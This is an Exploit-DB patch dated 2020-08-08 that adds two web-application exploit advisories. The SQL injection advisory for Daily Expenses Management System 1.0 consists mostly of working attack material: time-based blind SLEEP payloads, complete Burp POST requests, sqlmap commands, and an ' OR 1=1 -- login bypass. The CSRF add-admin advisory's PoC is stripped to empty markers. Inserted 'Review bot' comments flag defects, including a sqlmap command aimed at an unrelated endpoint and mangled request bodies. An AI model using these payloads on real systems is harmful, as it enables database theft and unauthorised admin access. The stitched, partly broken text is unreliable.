From a52cf4598fafcaa8820533850aebc691355c67cc Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sat, 8 Aug 2020 05:01:49 +0000
Subject: [PATCH] DB: 2020-08-08
2 changes to exploits/shellcodes
All-Dynamics Digital Signage System 2.0.2 - Cross-Site Request Forgery (Add Admin)
Daily Expenses Management System 1.0 - 'item' SQL Injection
---
 exploits/hardware/webapps/48736.txt | 89 +++++++++++++++
 exploits/php/webapps/48737.txt | 171 ++++++++++++++++++++++++++++
 files_exploits.csv | 2 +
 3 files changed, 262 insertions(+)
 create mode 100644 exploits/hardware/webapps/48736.txt
 create mode 100644 exploits/php/webapps/48737.txt
diff --git a/exploits/hardware/webapps/48736.txt b/exploits/hardware/webapps/48736.txt
new file mode 100644
index 000000000..95a18c302
--- /dev/null
+++ b/exploits/hardware/webapps/48736.txt
@@ -0,0 +1,89 @@
+# Exploit Title: All-Dynamics Digital Signage System 2.0.2 - Cross-Site Request Forgery (Add Admin)
+# Discovery by: LiquidWorm
+# Discovery Date: 2020-08-05
+# Vendor Homepage: https://www.all-dynamics.de
+ + + + + + + +

Grants the user the global administrative right. Administrative users are no longer under the control of the rights structure.

+

Global: Superior rolebased rights.

+ +
+ + + + + + + + + + + + + +
+ +
+ + +
+ + + + + + +
\ No newline at end of file
diff --git a/exploits/php/webapps/48737.txt b/exploits/php/webapps/48737.txt
new file mode 100644
index 000000000..320a3aa2b
--- /dev/null
+++ b/exploits/php/webapps/48737.txt
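Review bot: The HTML body of this advisory has not survived extraction on this page — after `+# Vendor Homepage: https://www.all-dynamics.de` only bare `+` markers and two stray label fragments (`Grants the user the global administrative right…`, `Global: Superior rolebased rights.`) remain, so the actual PoC form cannot be reviewed here and should be checked against the committed file. The header records only title, discoverer, discovery date and vendor homepage; there is no `# Tested on:` line and no vendor-response or CVE reference, and the index row (`48736,…,2020-08-07,LiquidWorm,webapps,hardware,`) adds nothing beyond a publication date, which leaves a reader with no way to tell whether 2.0.2 is the only affected version or whether a fix exists. An explicit `# Tested on:` and a `# CVE :` line (even `N/A` at time of publication) would make the record usable for triage. For the defending side, a CSRF that adds an administrator, as the title describes, is mitigated by a per-request anti-CSRF token on the admin-add form and `SameSite` session cookies, which is what an operator of this product should verify.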
@@ -0,0 +1,171 @@
+# Exploit Title: Daily Expenses Management System 1.0 - 'item' SQL Injection
+# Date: 2020-08-05
+# Exploit Author: Edo Maland
+# Vendor Homepage: https://www.sourcecodester.com/php/14372/daily-tracker-system-phpmysql.html
+# Software Link: https://www.sourcecodester.com/php/14372/daily-tracker-system-phpmysql.html
+# Version: 1.0
+# Tested on: XAMPP / Windows 10
+
+-------------------------------------------------------------------------------------------------------------------------------------
+# Feature: Add Expenses
+# Vulnerable file: add-expense.php
+# Vulnerable parameter :
+ - item
+ - costitem
+# PoC
+
+Url : http://example.com/dets/add-expense.php
+Methode : Post
+
+# Burpsuite Requests
+
+POST /dets/add-expense.php HTTP/1.1
+Host: example.com
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: id,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 138
+Origin: http://example.com
+Connection: close
+Referer: http://example.com/dets/add-expense.php
+Cookie: PHPSESSID=lu0nb6l63bleu39pbjf5a954p9
+Upgrade-Insecure-Requests: 1
+
+dateexpense=1337-11-11&item=1%27+AND+%28SELECT+8429+FROM+%28SELECT%28SLEEP%285%29%29%29IWeV%29+AND+%27hmPP%27%3D%27hmPP&costitem=2&submit=
+
+
+# Payload
+
+Parameter: #1* ((custom) POST)
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: dateexpense=1337-11-11&item=1' AND (SELECT 8429 FROM (SELECT(SLEEP(5)))IWeV) AND 'hmPP'='hmPP&costitem=2&submit=
+
+# Sqlmap Command
+
+sqlmap -u "http://example.com/alphaware/summary.php?tid=1337*" --dbs --random-agent -v 3
+
+
+-------------------------------------------------------------------------------------------------------------------------------------
+# Feature: Edit Profile
+# Vulnerable file: user-profile.php
+# 
Vulnerable parameter :
+ - fullname
+# PoC
+
+Url : http://example.com/dets/user-profile.php
+Methode : Post
+
+# Burpsuite Requests
+
+POST /dets/user-profile.php HTTP/1.1
+Host: example.com
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: id,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 189
+Origin: http://example.com
+Connection: close
+Referer: http://example.com/dets/user-profile.php
+Cookie: PHPSESSID=lu0nb6l63bleu39pbjf5a954p9
+Upgrade-Insecure-Requests: 1
+
+fullname=%27+AND+%28SELECT+2029+FROM+%28SELECT%28SLEEP%285%29%29%29JJJm%29+AND+%27UMUq%27%3D%27UMUq&email=info%40sql.id&contactnumber=1337173137®date=2020-08-05+13%3A49%3A51&submit=
+
+
+# Payload
+
+Parameter: #1* ((custom) POST)
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: fullname=admin3' AND (SELECT 2029 FROM (SELECT(SLEEP(5)))JJJm) AND 'UMUq'='UMUq&email=info@sql.id&contactnumber=1337173137®date=2020-08-05 13:49:51&submit=
+
+
+
+# Sqlmap Command
+
+sqlmap -u "https://example.com/dets/user-profile.php" --data="fullname=admin3*&email=info%40sql.id&contactnumber=1337173137®date=2020-08-05+13%3A49%3A51&submit=" --random-agent --threads 5 --cookie="PHPSESSID=lu0nb6l63bleu39pbjf5a954p9" -v 3 --dbs
+
+-------------------------------------------------------------------------------------------------------------------------------------
+
+# Feature: Expense Reports
+# Vulnerable file:
+ - expense-monthwise-reports-detailed.php
+ - expense-datewise-reports.php
+ - expense-yearwise-reports.php
+
+
+# Vulnerable parameter :
+ - fromdate
+ - todate
+
+# PoC
+
+Url : http://example.com/dets/expense-monthwise-reports-detailed.php
+Methode : Post
+
+# Burpsuite Requests
+
+POST /dets/expense-yearwise-reports-detailed.php HTTP/1.1
+Host: example.com 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: id,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 45
+Origin: http://example.com
+Connection: close
+Referer: http://example.com/dets/expense-yearwise-reports.php
+Cookie: PHPSESSID=lu0nb6l63bleu39pbjf5a954p9
+Upgrade-Insecure-Requests: 1
+
+fromdate=2020-08-13'+AND+(SELECT+1473+FROM+(SELECT(SLEEP(5)))rhGI)+AND+'moGo'%3d'moGo&todate=2020-08-20&submit=
+
+
+# Payload
+
+Parameter: #1* ((custom) POST)
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: fromdate=2020-08-13' AND (SELECT 1473 FROM (SELECT(SLEEP(5)))rhGI) AND 'moGo'='moGo&todate=2020-07-29&submit=
+
+# Sqlmap Command
+
+sqlmap -u "https://example.com/dets/expense-monthwise-reports-detailed.php" --data="fromdate=2020-08-13*&todate=2020-07-29&submit=" --random-agent --cookie="PHPSESSID=lu0nb6l63bleu39pbjf5a954p9" --dbs
+
+
+-------------------------------------------------------------------------------------------------------------------------------------
+# Feature: Login Page
+# Bypass Login Using SQLi on Admin/Member
+# Vulnerable file: index.php
+
+# PoC
+
+URL : https://example.com/dets/index.php
+
+Logging in with following details:
+
+ - Payload : "' OR 1=1 -- '"@sql.id
+
+# Burp Requests
+
+POST /dets/index.php HTTP/1.1
+Host: example.com
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: id,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 50
+Origin: http://example.com
+Connection: close
+Referer: http://example.com/dets/index.php
+Cookie: PHPSESSID=lu0nb6l63bleu39pbjf5a954p9 
+Upgrade-Insecure-Requests: 1
+
+email="' OR 1=1 -- '"@sql.id&password=1337&login=login
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index afabbf828..5e151c9ed 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -42977,3 +42977,5 @@ id,file,description,date,author,type,platform,port
 48730,exploits/php/webapps/48730.py,"Daily Expenses Management System 1.0 - 'username' SQL Injection",2020-08-04,"Daniel Ortiz",webapps,php,
 48733,exploits/php/webapps/48733.txt,"Stock Management System 1.0 - Authentication Bypass",2020-08-05,"Adeeb Shah",webapps,php,
 48734,exploits/php/webapps/48734.txt,"Victor CMS 1.0 - 'Search' SQL Injection",2020-08-06,screetsec,webapps,php,
+48736,exploits/hardware/webapps/48736.txt,"All-Dynamics Digital Signage System 2.0.2 - Cross-Site Request Forgery (Add Admin)",2020-08-07,LiquidWorm,webapps,hardware,
+48737,exploits/php/webapps/48737.txt,"Daily Expenses Management System 1.0 - 'item' SQL Injection",2020-08-07,screetsec,webapps,php,
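Review bot: The first `# Sqlmap Command` block targets `/alphaware/summary.php?tid=1337*`, which is a different application and endpoint from the one that section documents (`POST /dets/add-expense.php` with `item`/`costitem`), so it looks pasted from another advisory and should be corrected to the documented request or removed. The file header and the index row (`…'item' SQL Injection`) describe a single parameter, while the body also reports `costitem`, `fullname`, `fromdate`/`todate` and an authentication bypass on `index.php`; either the title should reflect the full scope or the extra findings belong in their own records so they can be tracked individually. In the Expense Reports section the `Url :` line names `expense-monthwise-reports-detailed.php` but the captured request posts to `expense-yearwise-reports-detailed.php` with a Referer of `expense-yearwise-reports.php`, so it is unclear which handler the capture actually exercised. The Edit Profile request bodies and sqlmap command contain `®date=`, which looks like `&regdate=` mangled by HTML-entity decoding somewhere between capture and commit; the committed file should be checked, since as written those bodies are not what the application would have parsed. From the defending side all four findings come down to unparameterized queries in the listed handlers, and the time-based probes shown here are recognisable in request logs by the `SLEEP(` pattern in form fields.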